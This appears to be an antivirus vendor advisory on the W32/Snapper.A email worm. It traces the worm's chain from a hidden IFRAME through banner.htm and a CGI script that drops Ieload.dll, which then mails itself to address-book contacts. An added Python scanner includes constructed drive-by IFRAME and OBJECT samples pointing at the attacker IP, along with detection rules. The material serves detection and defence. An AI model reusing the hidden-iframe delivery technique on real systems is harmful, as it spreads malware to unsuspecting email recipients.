Virus

W32/Snapper.A

Analysis


Specifics
This threat was short-lived, in that one of its main components (the .CGI script) is no longer accessible. The threat is composed of four parts:

HTML email message - generated by the DLL component, Ieload.dll, on an infected client
HTML web page (banner.htm) - retrieved when the reference embedded in the email is followed
CGI script - retrieved by the HTML web page; carries the encoded DLL
DLL component (Ieload.dll) - the virus proper; generates the email messages sent to other contacts

Without the .CGI script component the infection chain cannot complete, so in practice this threat no longer exists.


HTML Email Vector
This threat is introduced to a system via an email message sent from an infected client. The email body contains HTML with an IFRAME reference to a web address hosting an HTML page; that page in turn accesses a .CGI script, which creates a local file named Ieload.dll. The file is decoded from data embedded within the .CGI script itself.

The email may arrive in this format -

Subject: Re:
Body:
(none)

The message body carries no visible text; it consists of HTML code with an IFRAME reference to the HTML file "banner.htm" at a specific IP address.


CGI File Creation
When the email is opened and rendered as HTML, the IFRAME retrieves the file "banner.htm" from the web address. This HTML file branches on the browser version: for Internet Explorer 5.0 and 5.5 it uses an OBJECT tag with a DATA attribute to access the .CGI script, and for Internet Explorer 6.0 it uses an IFRAME to access the .CGI script. The .CGI script contains an embedded .DLL file, which is decoded into the Windows folder as "Ieload.dll" (file size 8,704 bytes). The .CGI script then launches the .DLL using the Windows utility RUNDLL32.
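Both the email body and banner.htm rely on the same trick: an IFRAME SRC or OBJECT DATA attribute that silently pulls content from a raw IP address. The following scanner, an added example and not Fortinet's or the virus author's code, extracts those references from HTML and flags the indicators named above (raw-IP host, .cgi target, banner.htm, zero-size frame, the blocked address). The sample documents are constructed to match the description; the /cgi-bin/banner.cgi path is an assumption, since the page does not give the script's name.

```python
"""Scan HTML (a mail body or a fetched page such as banner.htm) for hidden
IFRAME/OBJECT references of the kind used by W32/Snapper.A.
Added example: not code from the advisory or from the threat itself."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

BLOCKED_HOST = "198.170.245.129"  # IP named in the advisory's Recommended Action

# Constructed sample inputs shaped after the description (not captured from
# the real threat). The /cgi-bin/banner.cgi path is an assumption.
SAMPLE_EMAIL_BODY = (
    '<html><body>'
    '<iframe src="http://198.170.245.129/banner.htm" width="0" height="0"></iframe>'
    '</body></html>'
)
SAMPLE_BANNER_HTM = (
    '<html><body>'
    '<object data="http://198.170.245.129/cgi-bin/banner.cgi"></object>'
    '<iframe src="http://198.170.245.129/cgi-bin/banner.cgi" width="0" height="0"></iframe>'
    '</body></html>'
)
SAMPLE_BENIGN = '<p>See <a href="https://www.example.com/">our site</a></p>'


class EmbedCollector(HTMLParser):
    """Collect IFRAME SRC and OBJECT DATA targets, with their attributes."""

    def __init__(self):
        super().__init__()
        self.refs = []  # list of (tag, url, attrs)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe" and a.get("src"):
            self.refs.append((tag, a["src"], a))
        elif tag == "object" and a.get("data"):
            self.refs.append((tag, a["data"], a))


def classify_ref(tag, url, attrs):
    """Annotate one embedded reference with the indicators checked here."""
    parsed = urlparse(url)
    host = parsed.hostname or ""
    try:
        ipaddress.ip_address(host)  # raises ValueError for hostnames and ""
        raw_ip = True
    except ValueError:
        raw_ip = False
    path = parsed.path.lower()
    return {
        "tag": tag,
        "url": url,
        "host": host,
        "raw_ip": raw_ip,
        "cgi": path.endswith(".cgi"),
        "banner_htm": path.endswith("/banner.htm"),
        "hidden": attrs.get("width") == "0" or attrs.get("height") == "0",
        "blocked_host": host == BLOCKED_HOST,
    }


def scan_html(html):
    """Return a classification for every IFRAME/OBJECT reference in html."""
    parser = EmbedCollector()
    parser.feed(html)
    parser.close()
    return [classify_ref(tag, url, attrs) for tag, url, attrs in parser.refs]


def is_suspicious(html):
    """True when any embed points at a raw IP, a .cgi resource or the blocked host."""
    return any(f["raw_ip"] or f["cgi"] or f["blocked_host"] for f in scan_html(html))


if __name__ == "__main__":
    for name, doc in (("email", SAMPLE_EMAIL_BODY),
                      ("banner.htm", SAMPLE_BANNER_HTM),
                      ("benign", SAMPLE_BENIGN)):
        print(name, "SUSPICIOUS" if is_suspicious(doc) else "clean")
        for finding in scan_html(doc):
            print("   ", finding)
```

The raw-IP and .cgi indicators are generic and will also match legitimate embeds, so in a mail gateway they are better used as a score alongside the blocked-host match than as a standalone block rule.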


DLL Email Creation
When the binary "Ieload.dll" is launched via RUNDLL32, it reads the Windows Address Book (WAB) and attempts to generate an email to each contact listed. The email is created in this format -
Subject: Re:
Body:
(none)

The message body carries no visible text; it consists of HTML code with an IFRAME reference to the HTML file "banner.htm" at a specific IP address.


Recommended Action

  • Check the main screen of your FortiGate unit's web interface to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option
  • Using the FortiGate manager, block internal-to-external access to the IP address 198.170.245.129